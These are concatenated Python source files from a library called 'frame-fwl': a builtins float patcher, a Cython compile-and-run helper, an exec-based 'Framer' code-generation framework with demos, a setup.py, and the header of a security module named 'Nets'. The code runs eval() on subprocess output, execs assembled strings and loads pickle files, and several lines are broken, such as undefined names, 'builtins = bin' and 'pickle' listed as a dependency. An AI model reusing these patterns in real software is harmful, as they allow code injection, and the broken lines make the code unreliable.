class cl_float(float):... # classic float
builtins.cl_float = cl_float

dFLOAT = float

def set_default_float(): 
    global builtins
    builtins.float = FLOAT

def set_decimal_float(): 
    global builtins
    builtins.float = dFLOAT

def set_alt_funcs():
    global builtins
    builtins.superlarge = superlarge
    builtins.supersmall = supersmall
    builtins.repow = re_pow

    builtins._dfl_float = set_default_float
    builtins._new_float = set_default_float

def replace_alt_funcs():
    import builtins as nbins
    global builtins
    builtins = bin

class alt_math:
    def __init__(self, max: int = 4300):
        self.max = max
    def enable(self):
        set_decimal_float()
        set_alt_funcs()
        setmax(self.max)
    def disable(self):
        set_default_float()
        replace_alt_funcs()
        setmax(4300)
    def __enter__(self, *args):
        self.enable(); return self
    def __exit__(self, *args):
        self.disable()

builtins.__setmax__ = setmax
builtins.__altmath__ = alt_math



import tempfile
import os
import sys
import subprocess
import numpy as np
from setuptools import setup
from typing import Any, Optional, Dict
import json


class CythonCompilationError(Exception):
    """Cython compilation error"""
    pass


class CythonRuntimeError(Exception):
    """Compiled code execution error"""
    pass


class CythonImportError(Exception):
    """Cython import error"""
    pass




def cython(pyx_content: str, auto_convert: bool = True, function_name: Optional[str] = None, 
           args: tuple = (), kwargs: Optional[Dict[str, Any]] = None):
    """
    Compiles and executes Cython code.
    
    Args:
        pyx_content: Cython code to compile
        auto_convert: Automatically convert result via eval
        function_name: Name of function to call (default 'main')
        args: Positional arguments for the function
        kwargs: Keyword arguments for the function
        
    Returns:
        Code execution result
        
    Raises:
        CythonImportError: If Cython is not installed
        CythonCompilationError: If compilation fails
        CythonRuntimeError: If code execution fails
    """
    try:
        import Cython
    except ImportError:
        raise CythonImportError(
            "Cython is not installed. Install it: pip install Cython"
        )
    
    if kwargs is None:
        kwargs = {}
    
    function_name = function_name or 'main'
    
    with tempfile.TemporaryDirectory() as temp_dir:
        pyx_path = os.path.join(temp_dir, "module.pyx")
        main_path = os.path.join(temp_dir, "main.py")
        setup_path = os.path.join(temp_dir, "setup.py")
        
        # Write .pyx file
        try:
            with open(pyx_path, 'w', encoding='utf-8') as f:
                f.write(pyx_content)
        except Exception as e:
            raise CythonCompilationError(
                f"Failed to write .pyx file: {e}"
            )
        
        # Create main.py with argument handling
        enhanced_main = f'''
import sys
import os
import json
import traceback

sys.path.insert(0, os.getcwd())

try:
    import module
except Exception as e:
    print(json.dumps({{
        "error": "import",
        "message": str(e),
        "traceback": traceback.format_exc()
    }}))
    sys.exit(1)

def capture_output():
    try:
        # Load arguments
        args = json.loads("""{json.dumps(args)}""")
        kwargs = json.loads("""{json.dumps(kwargs)}""")
        
        result = None
        
        if hasattr(module, '{function_name}'):
            # Call specified function with arguments
            func = getattr(module, '{function_name}')
            result = func(*args, **kwargs)
        elif hasattr(module, 'main'):
            # Fallback to main without arguments (for backward compatibility)
            result = module.main()
        else:
            # Execute module code and capture output
            import io
            from contextlib import redirect_stdout
            f = io.StringIO()
            with redirect_stdout(f):
                import importlib
                importlib.reload(module)
            result = f.getvalue()
        
        return result
    except Exception as e:
        print(json.dumps({{
            "error": "runtime",
            "message": str(e),
            "traceback": traceback.format_exc()
        }}))
        sys.exit(1)

if __name__ == "__main__":
    output = capture_output()
    if output is not None:
        print(json.dumps({{"success": True, "result": str(output)}}))
    else:
        print(json.dumps({{"success": True, "result": None}}))
'''
        
        try:
            with open(main_path, 'w', encoding='utf-8') as f:
                f.write(enhanced_main)
        except Exception as e:
            raise CythonCompilationError(
                f"Failed to create main.py: {e}"
            )
        
        # Create setup.py
        setup_content = '''
from setuptools import setup
from Cython.Build import cythonize
import sys

try:
    setup(ext_modules=cythonize("module.pyx", compiler_directives={'language_level': '3'}))
except Exception as e:
    print(f"Setup error: {e}", file=sys.stderr)
    sys.exit(1)
'''
        try:
            with open(setup_path, 'w', encoding='utf-8') as f:
                f.write(setup_content)
        except Exception as e:
            raise CythonCompilationError(
                f"Failed to create setup.py: {e}"
            )
        
        # Compile
        try:
            build_result = subprocess.run(
                [sys.executable, "setup.py", "build_ext", "--inplace"],
                cwd=temp_dir,
                capture_output=True,
                text=True,
                timeout=30
            )
            
            if build_result.returncode != 0:
                error_msg = build_result.stderr or build_result.stdout
                raise CythonCompilationError(
                    f"Cython compilation error:\n{error_msg}"
                )
        except subprocess.TimeoutExpired:
            raise CythonCompilationError(
                "Compilation timeout (30 seconds)"
            )
        except CythonCompilationError:
            raise
        except Exception as e:
            raise CythonCompilationError(
                f"Unexpected compilation error: {e}"
            )
        
        # Execute
        try:
            result = subprocess.run(
                [sys.executable, "main.py"],
                cwd=temp_dir,
                capture_output=True,
                text=True,
                timeout=30
            )
            
            if result.returncode != 0:
                try:
                    error_data = json.loads(result.stdout)
                    if error_data.get("error") == "import":
                        raise CythonRuntimeError(
                            f"Module import error:\n{error_data['message']}\n\n"
                            f"Traceback:\n{error_data['traceback']}"
                        )
                    elif error_data.get("error") == "runtime":
                        raise CythonRuntimeError(
                            f"Execution error:\n{error_data['message']}\n\n"
                            f"Traceback:\n{error_data['traceback']}"
                        )
                except json.JSONDecodeError:
                    raise CythonRuntimeError(
                        f"Execution error:\n{result.stdout}\n{result.stderr}"
                    )
            
            # Parse result
            try:
                output_data = json.loads(result.stdout)
                if output_data.get("success"):
                    res = output_data.get("result")
                    if res is None:
                        return None
                    
                    # Try to convert result
                    if auto_convert and res:
                        try:
                            return eval(res)
                        except (SyntaxError, NameError):
                            return res
                    return res
            except json.JSONDecodeError:
                # Fallback to old output format
                res = result.stdout.strip()
                if auto_convert and res:
                    try:
                        return eval(res)
                    except (SyntaxError, NameError):
                        return res
                return res
                
        except subprocess.TimeoutExpired:
            raise CythonRuntimeError(
                "Execution timeout (30 seconds)"
            )
        except CythonRuntimeError:
            raise
        except Exception as e:
            raise CythonRuntimeError(
                f"Unexpected execution error: {e}"
            )

def runfile(path: str, function_name: Optional[str] = None, 
            args: tuple = (), kwargs: Optional[Dict[str, Any]] = None):
    """
    Compiles and executes Cython code from file.
    
    Args:
        path: Path to .pyx file
        function_name: Name of function to call
        args: Positional arguments
        kwargs: Keyword arguments
        
    Returns:
        Execution result
        
    Raises:
        FileNotFoundError: If file not found
        CythonCompilationError: If compilation fails
        CythonRuntimeError: If execution fails
    """
    try:
        with open(path, encoding='utf-8') as file:
            content = file.read()
    except FileNotFoundError:
        raise FileNotFoundError(f"File not found: {path}")
    except Exception as e:
        raise CythonCompilationError(f"Failed to read file {path}: {e}")
    
    return cython(content, function_name=function_name, args=args, kwargs=kwargs)

def setupfile(path: str = 'all'):
    path = '*' if path == all else path
    from Cython.Build import cythonize

    setup(
        ext_modules=cythonize(f"{path}.pyx"),
        include_dirs=[np.get_include()]
    )


import threading
import cloudpickle as pickle
import json
from typing import Dict, Any
from .exceptions import *
from .funcs import exec_and_return, str_to_int
import ast, inspect


class _CodeGenerator:
    '''Basic system engine for code generation.'''
    def __init__(self):
        self._code = []
        self._cache = 0
    def _new_line(self, text: str): 
        self._code.append(text)
        self._cache += 1
        return self
    def _gen_temp_var(self, k: int = 0):
        var_name = f'__tmp_{self._cache - k}'
        self._cache += 1
        return var_name
    def _gen_id(self, k: int = 0):
        id = f'_id{len(self._code)+self._cache+k}{self._cache * (k+1)}{k}'
        self._cache += 1
        return id
    def _comentary(self, *args):
        self._new_line(f'"""{"\n".join(args)}"""')







class Framer(_CodeGenerator):
    '''
# Framer

Main context manager class: Framer.

For system.
    '''
    def __init__(self):
        super().__init__()
        self._vars = {}
        self._aliases = {}
        self._types = {}
        self._lock = threading.RLock()
        self._new_code_line = self._new_line
    
    def var(self, name:str, value):
        self._vars[name] = value
        return self

    def op(self, a, b, 
           operator: str = '+'):
        result_var = self._gen_temp_var()
        res = f'{a} {operator} {b}'
        code_line = f'{result_var} = {res}'
        self._code.append(code_line)
        return result_var
    
    def execute(self, algoritm=1, globals=None):
        try:
            final_code = "\n".join(self._code)
            local_scope = self._vars.copy()
            if globals is None:
                globals = {}
            exec(final_code, globals if globals != 'locals' else local_scope, local_scope)
            if algoritm == 1:
                return_var = "__frame_return_value"
                return local_scope.get(return_var)
            else:
                return local_scope
        except Exception as e:
            error_msg = f"\nError in frame execution: {e}. \nCode for execution:\n\n{final_code}"
            raise FrameExecutionError(error_msg)
    
    def get_thread_safe(self, name):
        with self._lock: return self._vars.get(self._aliases[name])

    def __enter__(self):
        System.last_framer = System.framer
        System.framer = self
        return self
    def __exit__(self, *args, **kwargs): pass








class SystemClass:
    '''
# System

System context class: System.

Has main [{framer}: Framer], [{last_framer}: Framer] and [{framers}: dict] self parameters.

For system.'''
    def __init__(self):
        self.framer = Framer()
        self.last_framer = self.framer
        self.framers = {'basic': Framer(), 'temp': Framer()}
    
    @classmethod
    def get_global(cls):
        if not hasattr(cls, '_global'):
            cls._global = cls()
        return cls._global

System = SystemClass().get_global()







class SystemOP:
    '''
    # System operations
    Basic simple api for [System] and [Framer].
    '''
    def match(condition: str, 
              true_block: str, 
              false_block: str = None, 
              framer: Framer | None = None):
        'Simple condition blok for frame.'
        framer = System.framer if framer == None else framer
        framer._comentary('condition block', condition)
        cache = framer._gen_id(len(framer._aliases) + len(framer._code))
        Var(f'__condition_temp{cache}', condition, with_eval=True, framer=framer)
        framer._new_code_line(f'if __condition_temp{cache}:')
        new_true_block = ''
        for i in true_block.split('\n'):
            if i.strip() != '': new_true_block += '\n    ' + i
        framer._new_code_line(f'    {new_true_block}')
        if false_block:
            framer._new_code_line('else:')
            new_false_block = ''
            for i in false_block.split('\n'):
                if i.strip() != '': new_false_block += '\n    ' + i
            framer._new_code_line(f'    {new_false_block}')
    def to_last():
        s = System.framer
        System.framer = System.last_framer
        System.last_framer = s








class Var:
    '''
# Variable

Abstraction api class for [Framer] and [System].

### Args:

- {name}: str - name of variable.
- {value}: Any - value of variable.
- {type}: str - type hint for debug in code.
- {to_repr}: bool - if true, value in variable will be repr(value).
- {with_eval}: bool | str - if true, value in variable will be ```f'eval({repr(value)})'```, if 'literal' value in variable will be ```f'ast.literal_eval({repr(value)})'``` (literal works only after import ast)
- {framer}: Framer | None - Framer object.
- {check_for_constant}: bool - check is variable constant if true
- {add_to_code}: bool - add variable to code in format `var: type = val` if true, else pass
- {not_add_if_exist}: bool - create new variable if variable {name} is not created, else pass


### Example: 
```
ctx = Framer() # creating context
Var('x', 10, framer = ctx) # setting variable
```
    '''
    def __init__(self, 
                 name: str, 
                 value, 
                 type: str = 'int', 
                 to_repr: bool = True, 
                 with_eval: bool | str = False,
                 framer: Framer | None | str = 'System',
                 check_for_constant: bool = True,
                 add_to_code: bool = True,
                 not_add_if_exist: bool = False):
        framer: Framer = Framer() if framer == None else System.framer if isinstance(framer, str) and framer.lower().strip() == 'system' else framer
        param_name = framer._gen_temp_var()
        self.name = param_name
        self.value = value
        to_repr = True if with_eval else to_repr
        val = repr(value) if to_repr else value
        val = f'eval({val})' if with_eval == True else f'ast.literal_eval({val})' if with_eval == 'literal' else val
        with framer._lock:
            def add(type):
                if name in framer._types and check_for_constant:
                    if framer._types[name] == 'const':
                        raise VariableTypeError(f'Variable already declared with type [{type}]. It cannot be overwritten.')
                framer.var(param_name, value)
                framer._types[name] = type
                type = type.replace("const", "int")
                if add_to_code: framer._new_line(f'{name}: {type} = {val}')
                framer._aliases[name] = param_name
            if not_add_if_exist:
                cond1 = self.value in list(framer._aliases.keys())
                cond2 = self.value in list(framer._types.keys())
                if not (cond1 and cond2): add(type)
            else: add(type)
        self.framer = framer







def Get(name: str, 
        framer: Framer | None | str = 'System'):
    '''Get variable by {name} from {framer} method.'''
    framer: Framer = Framer() if framer == None else System.framer if isinstance(framer, str) and framer.lower().strip() == 'system' else framer
    return framer.get_thread_safe(name)









class Return:
    '''
# Return
 
Method to set variable to return with Exec() method.

### Args: 
- {value}: Var - Variable for return (object).
- {framer}: Framer | None - Framer object.

### Example: 
Code:
```
with Frame() as f: # creating context
    # setting variables
    x = Var('x', 10)
    y = Var('y', 50)
    res = Var('test', Get('x') * Get('y')) 
    Return(res) # setting variable to return
print('result:', Exec()) # executing code
```
Output:
```
result: 500
```'''
    def __init__(self, 
                 value: Var, 
                 framer: Framer | None | str = 'System'):
        framer: Framer = Framer() if framer == None else System.framer if isinstance(framer, str) and framer.lower().strip() == 'system' else framer
        return_var = "__frame_return_value"
        try: framer.var(return_var, f'{framer._vars.get(value.name)}')
        except AttributeError:
            raise FramerError(f'Exception in atribute parsing. \nObject [{value}, {type(value)}] has no atribute .name to create return. \nPlease, use [value] declaration like [`res = Var(...); Return(res, ...)`].')
        self.framer = framer









class Code:
    '''
# Code append

Method to append code in Framer.

### Args:
- {code}: str - code for paste to framer.
- {framer}: Framer | None - framer object.

### Example:
Code:
```
with Frame() as f:
    x = Var('x', 10)
    y = Var('y', 50)
    Code('result = x + y')
    Var('test', Get('x') * Get('y')) 
    Var('res', 'test + result', with_eval=True)
print('result:', exec_and_return(f.compile(), 'res'))
```
Output:
```
result: 560
```'''
    def __init__(self, 
                 code: str, 
                 framer: Framer | None | str = 'System'):
        framer: Framer = Framer() if framer == None else System.framer if isinstance(framer, str) and framer.lower().strip() == 'system' else framer
        framer._new_code_line(code)
        self._code = code
        self.framer = framer









def Exec(framer: Framer | None | str = 'System', algoritm: int = 1, globals: dict | str = 'locals'):
    '''
## Execution of [Frame] method.
## Args: 
- {framer}: Framer | None | str - Framer object.
- {algoritm}: int - returning all local_scope if 2, else only result var.
- {globals}: dict | str - globals for execution.
    '''
    framer: Framer = Framer() if framer == None else System.framer if isinstance(framer, str) and framer.lower().strip() == 'system' else framer
    with framer._lock:
        return framer.execute(algoritm, globals)
    








class Frame:
    '''
# Frame
Key abstraction api for all [Framer] and [System] methods.

(framer in functions is Frame.framer)

You can use with to create context, and call [Frame] object like `frame()` to get framer.

### Args of initialization:
- {framer}: str | Framer = 'new' - framer context object for frame.
- {safemode}: bool - if safemode true, Exec method will be is not available.
- {name}: str - framer name in [System.framers]
- {save_while_exit}: bool - if true, while will be called [__exit__], context will be automaticly saved.
- {save_args}: list - list of args [name, format] for method save.
- {add_ast}: bool - import ast to frame and var.with_eval - literal available if true.

### Example usage:
Code:
```
with Frame(safemode=False) as f:
    f.Var('x', 10)
    f.Var('y', 50)
    fOp.match('x > y', 'print("x bigger")', 'print("y bigger")')
    f.Var('test', f['x'] * f['y']) 
    f.Exec(2, True)
print('result:', f[''])
```
Output:
```
y bigger
result: 500
```'''
    def __init__(self, 
                 framer: str | Framer = 'new', 
                 safemode: bool = True, 
                 name: str = 'f1',
                 save_while_exit: bool = False,
                 save_args: list = ['ctx', 'pickle'], 
                 add_ast: bool = False):
        self._ast_available = add_ast
        if add_ast: self.Code('import ast')
        self.__saving = [save_while_exit, save_args]
        self.framer: Framer = Framer() if framer == 'new' else framer
        self.__safemode = safemode
        self._name = name
        System.framers[name] = self.framer
    def Sys(self) -> SystemOP: 
        '''Return [SystemOp] class.'''
        return SystemOP
    def System(self) -> SystemClass: 
        '''Return [SystemClass] class.'''
        return System
    def set_System(self, new_sys: SystemClass = SystemClass()) -> SystemClass:
        '''Set system class'''
        global System
        System = new_sys
        return self
    def Var(self, 
            name: str, 
            value, 
            type: str = 'int', 
            to_repr: bool = True,
            with_eval: bool = False,
            check_for_constant: bool = False,
            add_to_code: bool = True,
            not_add_if_exist: bool = False) -> Var:
        '''
# Variable

Set variable function. Abstraction for [Var] class.

### Args:
- {name}: str - name of variable.
- {value}: Any - value of variable.
- {type}: str - type hint for debug in code.
- {to_repr}: bool - if true, value in variable will be repr(value).
- {with_eval}: bool | str - if true, value in variable will be ```f'eval({repr(value)})'```, if 'literal' value in variable will be ```f'ast.literal_eval({repr(value)})'``` (literal works only after import ast)
- {check_for_constant}: bool - check is variable constant if true
- {add_to_code}: bool - add variable to code in format `var: type = val` if true, else pass
- {not_add_if_exist}: bool - create new variable if variable {name} is not created, else pass
```
        '''
        if with_eval == 'literal':
            raise FrameApiError('Ast.literal_eval is not avilable. ')
        return Var(name = name, 
                   value = value, 
                   type = type, 
                   to_repr = to_repr, 
                   with_eval = with_eval, 
                   framer = self.framer, 
                   check_for_constant = check_for_constant,
                   add_to_code = add_to_code,
                   not_add_if_exist = not_add_if_exist)
    def Get(self, name: str) -> Any: 
        '''Get variable by {name}.'''
        return Get(name, self.framer)
    def Return(self, name: Var) -> Return: 
        '''Set of variable name to return.'''
        return Return(name, self.framer)
    def Code(self, code: str, comentary: bool = True, *comentaries) -> Code:
        '''
## Append code to frame.
## Args: 
- {code}: str - code for append to framer.code.
- {comentary}: bool - add debug comentary to code if true.
- {*comentaries} - strings for append to debug comentary.
        '''
        if comentary:
            self.framer._comentary('code section', f'Framer: {self._name}', f'Safemode: {self.__safemode}', *comentaries)
        return Code(code, self.framer)
    def Exec(self, algoritm: int = 1, add_localscope_to_vars: bool = False, globals: dict | str = 'locals') -> Any:
        '''
## Executing code of frame.
## Args:
- {algoritm}: int[1|2] - return variable, choised by [Return] method if 1, return full localscope if 2.
- {add_localscope_to_vars}: bool - add all localscope after execution to code and variables if true.
- {globals}: dict | str['locals'] - globals for execution. `globals = locals` if {globals} is 'locals'.
        '''
        if not self.__safemode: 
            res = Exec(self.framer, algoritm if not add_localscope_to_vars else 2, globals=globals)
            if add_localscope_to_vars == False: return res
            else: 
                self.add_to_code_localscope(res)
                return res
        else: raise FrameApiError('Exec is not avialable in safemode.')
    def add_to_code_localscope(self, data: dict) -> 'Frame':
        '''
        Add variables from {data} to system vars.
        '''
        for i in data: 
            val = data[i]
            cond1 = not isinstance(val, object)
            blocked = i in ('__builtins__') # not allowed vars
            if not blocked:    
                if cond1 and i != '__builtins__': 
                    self.Var(i, val, to_repr=True)
                else: 
                    self.Var(i, val, to_repr=False, 
                            add_to_code=False, 
                            not_add_if_exist= True)
        return self
    def compile(self) -> str: 
        '''Get full code of frame.'''
        return '\n'.join(self.framer._code)
    def reset(self) -> 'Frame': 
        '''Recreate framer.'''
        self.framer = Framer()
        return self
    def register(self, name: str = None):
        'Register any construction (class/function) to frame decortor.'
        def decorator(func):
            func_name = name or func.__name__
            try:
                # geting source code
                source_code = inspect.getsource(func)
                lines = source_code.split('\n')[1:]
                tabbed = False
                can_edit_tabs = True
                tabs = 0
                cleaned_code = []
                # adaptive cleaning tabs
                for i in lines:
                    if i.startswith('   '): 
                        t = 0
                        for local_i in i: 
                            if local_i == ' ':
                                t += 1
                            if t % 4 == 0: 
                                if can_edit_tabs: tabs = t/4
                            tabbed = True
                        can_edit_tabs = False
                    if not i.startswith('   '): tabbed = False; can_edit_tabs = False
                    if tabbed: 
                        tabs_c = int(4 * tabs)
                        cleaned_code.append(i[tabs_c:])
                    else: 
                        cleaned_code.append(i)
                # adding to code
                cleaned_code = '\n'.join(cleaned_code)
                type = cleaned_code.split(" ")[0]
                self.Code(f"\n# Registred construction: {type} {func_name}\n{cleaned_code}", True, f'Registring [{type} {func_name}] construcntion.')
            except Exception as e:
                print(f"Warning: Could not register source code for {func_name}: \n{e}")
                self.Var(func_name, func, to_repr=False)
            return func
        return decorator
    def save(self, filename: str, format: str = 'pickle') -> 'Frame':
        '''
        ## Saving frame to file.
        ### Args:
        - {filename}: str - file name
        - {format}: str - saving format ('pickle' or 'json')
        '''
        data = self.data
        try:
            if format == 'pickle':
                with open(filename, 'wb') as f: pickle.dump(data, f)
            elif format == 'json':
                json_data = self._serealize('json')
                with open(filename, 'w', encoding='utf-8') as f: 
                    json.dump(json_data, f, indent=2, ensure_ascii=False)
            else: raise FrameApiError(f"Unsupported format: {format}")
            return self
        except Exception as e:
            raise FrameApiError(f"Save failed: {e}")

    def load(self, filename: str = 'ctx', format: str = 'pickle', local_safemode: bool = True) -> 'Frame':
        '''
        ## Loading frame from file.
        ### Args:
        - {filename}: str - file name
        - {format}: str - loading format ('pickle' or 'json')
        '''
        try:
            if format == 'pickle':
                with open(filename, 'rb') as f: data = pickle.load(f)
            elif format == 'json':
                with open(filename, 'r', encoding='utf-8') as f: data = json.load(f)
                restored_vars = {}
                for k, v in data['framer']['_vars'].items():
                    try: restored_vars[k] = ast.literal_eval(v)
                    except: 
                        try:
                            if not self.__safemode or not local_safemode: 
                                restored_vars[k] = eval(v)
                            else: restored_vars[k] = v
                        except Exception as e: 
                            raise FrameApiError(f'Error in parsing parameters: {e}')
                data['framer']['_vars'] = restored_vars
            else: raise FrameApiError(f"Unsupported format: {format}")
            self._load_data(data)
            return self
        except Exception as e:
            raise FrameApiError(f"Load failed: {e}")
    @property
    def data(self) -> dict:
        '''Get all data from frame like dict (for serealization).'''
        return {
                'framer': {
                    '_code': self.framer._code,
                    '_vars': self.framer._vars,
                    '_aliases': self.framer._aliases,
                    '_types': self.framer._types
                },
                'saving': self.__saving,
                'safemode': self.__safemode,
                'name': self._name
                }

    def _serealize(self, form: str = 'pickle'):
        data = self.data
        json_data = {
            'framer': {
                '_code': data['framer']['_code'],
                '_vars': {k: str(v) for k, v in data['framer']['_vars'].items()},
                '_aliases': data['framer']['_aliases'],
                '_types': data['framer']['_types']
            },
            'safemode': data['safemode'],
            'saving': data['saving'],
            'name': data['name']
        }
        return data if form == 'pickle' else json_data
    def _load_data(self, data: dict):
        self.framer._code = data['framer']['_code']
        self.framer._vars = data['framer']['_vars'] 
        self.framer._aliases = data['framer']['_aliases']
        self.framer._types = data['framer']['_types']
        self.__safemode = data['safemode']
        self.__saving = data['saving']
        self._name = data['name']
        return self
    def _get_safemode(self): return self.__safemode
    def __enter__(self): 
        self.framer.__enter__()
        return self
    def __exit__(self, *args, **kwargs): 
        if self.__saving[0]: self.save(*self.__saving[1])
    def __call__(self, *args, **kwds):
        return self.framer
    def __getitem__(self, index):
        return self.Get(index)









Var('name', 'frame_concept', framer=System.framers['basic'])

if __name__ == '__main__':
    with Frame() as f:
        x = Var('x', 10)
        y = Var('y', 50)
        SystemOP.match('x > y', 'print("x bigger")', 'print("y bigger")')
        res = Var('test', Get('x') * Get('y')) 
        Return(res)  
    print(Exec())  # → 500
    with Frame() as f:
        x = Var('x', 10)
        y = Var('y', 50)
        res = Var('res', 'x + y', with_eval=True)
        Return(res)
    print(Exec())
    code = f.compile()
    print(exec_and_return(code, 'res')) # 60
    with Frame() as f:
        x = Var('x', 10)
        y = Var('y', 50)
        Code('result = x + y')
        Var('test', Get('x') * Get('y')) 
        Var('res', 'test + result', with_eval=True)
    print(exec_and_return(f.compile(), 'res')) # 560
    with Frame(save_while_exit=True, save_args=['ctx.json', 'json']) as f:
        f.Var('x', 10)
        f.Var('y', 50)
        SystemOP.match('x > y', 'print("x bigger")', 'print("y bigger")')
        f.Var('test', Get('x') * Get('y')) 
        print(f['test'], '========')
        @f.register()
        def test(): 
            print('testing')
        @f.register()
        class Test():
            hello = 'World'
            pass
    with Frame().load('ctx.json', format='json') as f:
        code = f.compile()
        print('result:', exec_and_return(code, 'test'))
    print('\n\n======= CODE =======')
    print(code)
    with Frame(safemode=False) as f:
        f.Code('test = 10 + 2')
        f.Code('test2 = "test"')
        f.Exec(2, True)
        print(f['test']) # 12

    with Frame(safemode=False) as f:
        f.Code('''
a = 10
b = 20  
c = a + b
d = (a + b) + c
        ''')
        f.Exec(2, True)  # ← ВСЕ переменные автоматически становятся частью фрейма!
        print(f['c'])  # 30
        print(f['d'])  # результат 60


    # Пример: динамическое создание API
    with Frame(safemode=False) as f:
        f.Code('''
def create_multiplier(n):
    return lambda x: x * n
        ''')
        f.Code('test = 0.3')
        f.Exec(2, True)  # Захватываем функцию create_multiplier
        print(f['create_multiplier'](18)(13))  # 234 - ЖИВАЯ ФУНКЦИЯ!
        print(f['test'], type(f['test'])) # 0.3, float - тип не утерян!

    with Frame(safemode=False) as api_factory:
        api_factory.Code('''
def create_rest_endpoint(path, handler):
    return {"path": path, "handler": handler, "method": "GET"}
    
users_endpoint = create_rest_endpoint("/users", lambda req: {"users": []})
posts_endpoint = create_rest_endpoint("/posts", lambda req: {"posts": []})
        ''')
        api_factory.Exec(2, True)
        
        # Теперь endpoints - живые объекты в фрейме!
        print(api_factory['users_endpoint']['handler'](10))  # Работает!


    with Frame(safemode=False) as meta:
        meta.Code('''
class DynamicClass:
    def __init__(self, name):
        self.name = name
        
    @classmethod
    def create_variant(cls, suffix):
        return type(f"{cls.__name__}_{suffix}", (cls,), {})
    
variant_factory = DynamicClass.create_variant
        ''')
        meta.Exec(2, True)
        
        # Динамическое создание классов становится тривиальным
        NewClass = meta['variant_factory']('Special')
        instance = NewClass("test")
        print(instance, NewClass)

    # Интерактивный Python tutor
    with Frame(safemode=False) as lesson:
        lesson.Code('''
# Урок по функциям
def factorial(n):
    return 1 if n <= 1 else n * factorial(n-1)
        ''')
        lesson.Exec(add_localscope_to_vars= True, globals='locals')
        
        # Студенты могут исследовать результаты
        print("Факториалы:", lesson['factorial'](4))
    
    with Frame(safemode= False) as database:
        database.Code('''
tables = {}
def create_table(name, schema):
    tables[name] = {'schema': schema, 'data': []}
    
def insert_into(table, record):
    tables[table]['data'].append(record)
        ''')
        database.Exec(2, True)  # Захватываем все функции и переменные
        database['create_table']('test', {'users': []})
        print(database['tables']) # {'test': {'schema': {'users': []}, 'data': []}}
    
    with Frame(safemode=False) as database:
        database.Code('''
tables = {}
def create_table(name, schema):
    tables[name] = {'schema': schema, 'data': []}
    
def insert_into(table, record):
    tables[table]['data'].append(record)
    
def query(table, condition):
    return [record for record in tables[table]['data'] if condition(record)]
        ''')
        database.Exec(2, True)  # Захватываем все функции и переменные
        
    # Теперь database['tables'] и database['insert_into'] - живые объекты!
    database['create_table']('users', {'name': '', 'age': 0})
    database['insert_into']('users', {'name': 'John', 'age': 30})
    results = database['query']('users', lambda user: user['age'] > 25)
    database.Code(f'result = {results}')
    database.Exec(2, True)
    print(database['result']) # [{'name': 'John', 'age': 30}]

    '''
 y bigger
500
x + y
60
560
500 ========
y bigger
result: <function test at 0x102ec7a00>


======= CODE =======
import ast
x: int = 10
y: int = 50
"""condition block
x > y"""
__condition_temp_id15356: int = eval('x > y')
if __condition_temp_id15356:
    
    print("x bigger")
else:
    
    print("y bigger")
test: int = 500
"""code section
Framer: f1
Safemode: True
Registring [def test] construcntion."""

# Registred construction: def test
def test(): 
    print('testing')

"""code section
Framer: f1
Safemode: True
Registring [class Test] construcntion."""

# Registred construction: class Test
class Test():
    hello = 'World'
    pass

12
30
60
234
0.3 <class 'float'>
{'users': []}
<DynamicClass_Special object at 0x102e44050> <class 'DynamicClass_Special'>
Факториалы: 24
{'test': {'schema': {'users': []}, 'data': []}}
[{'name': 'John', 'age': 30}]   

    '''


'''
# Nets Concept Core
NETS - Internet Security Lib.
Use this library only for test and education.

### Modules:
    hack - hacking core.
    crypto - cryptography core.
    secure - security core.

### Functions:
    GrayHackApi, WhiteHackApi, HashCryptoApi, RandCryptoApi, DatsSecureApi

### !Attention!
The author is not responsible for the user's actions, the library is intended for white hacking, Internet security, tests, education and cryptography.
'''

from .hack import *
from .crypto import *
from .secure import *
from .utils import validate_password_strength, logging


from setuptools import setup, find_packages


setup(
    name='frame-fwl', # frame-framework-lib
    version='0.5.9.1',
    description='The Frame - multitool framework.',
    author='pt',
    author_email='kvantorium73.int@gmail.com',
    packages=find_packages(),
    install_requires=['cryptography', 'requests', 'pickle'],
    python_requires='>=3.10', 
    classifiers=[
        'Development Status :: 3 - Alpha',
        'Intended Audience :: Developers',
        'License :: OSI Approved :: MIT License',
        'Programming Language :: Python :: 3.10',
        'Programming Language :: Python :: 3.11',
        'Programming Language :: Python :: 3.12',
        'Programming Language :: Python :: 3.13',
        'Programming Language :: Python :: 3.14',
        'Operating System :: OS Independent',
    ],
    entry_points={
        'console_scripts': [
            'framefile=frame.framefile:main',
        ],
    },
    keywords='frame, superglobal, context, context manager, framing, code generation, execution, nets, frames',
    url='https://github.com/pt-main/frame'
)


'''
# Framing Concept Core
The Frames - multitool programming paradigm.


### Modules:
    - exceptions - exceptions of frames.
    - frames - main file of lib.
    - funcs - other functions file.
    - plugin_system - plugin base.
    - plugins - official plugins.


### Functions: 
    #### Framer functions -
        FramesComposer (key-class), Frame (key-class), Framer (lowlevel-class), fExec, fGet, fVar, fSys, fOp, fReturn, fCode, @framing, 
        framing_result, FastGet
    #### Plugin functions - 
        PluginBase (metaclass), PluginRegistry (key-class), MathPlugin, register_plugin
    #### Other functions - 
        exec_and_return_safe (key-function), exec_and_return, str_to_int, open_and_run, save_code_to_bin
    #### Errors - 
        FrameApiError, FramerError, FramingError, FrameExecutionError, PluginError, 
        PluginIsNotWorkingError

### Main terms - 
    - Frame - An isolated execution space with its own variables and code. Can interact with other contexts.
    - Framing - creating a local environment with superglobal variables.
    - Superglobal is the state of an object when it does not depend on the context. Roughly speaking, a global frame.
    - Framefile is a binary frame image that can be saved and loaded.
    - fcomp (iso) - Frames composition file

### Warning: 
Main clases of frame (like [Framer], for example) using eval/compile/exec. 

If you want to protect your porgram (full off exec), you can use {safemode} in Frame.

Not for web development.
'''

from .frames import (Framer, Frame, Exec as fExec, Get as fGet, Var as fVar, 
                System as fSys, SystemOP as fOp, Return as fReturn, Code as fCode)
from .composer import (FramesComposer)
from .funcs import (str_to_int, exec_and_return_safe, exec_and_return)
from .exceptions import (FrameApiError, FrameExecutionError, FramerError, FramingError, 
                        PluginError, PluginIsNotWorkingError)

_framecore_version_ = '0.8.1'

def framing(
    framer: str | Framer = 'new',
    name_of_result_variable: str = 'res',
    return_frame: bool = False
    ):
    '''
## Frame decorator
### Args: 
arg {framer}:  object[Frame | Framer] | str = 'new' -

- Frame to load {name_of_result_variable}. 
- If == 'new', will be created new frame.
    
arg {name_of_result_variable}:  str = 'res' -
- Variable that will be created in {framer}.
    
arg {return_frame}:  bool = False -
- Args for choise create 'frame' variable (Frame object named `frame`) in System.frames['temp'].
### Examples:
#### First code example: 
```
@framing(return_frame=True)
def test():
    print('test')
    return 10
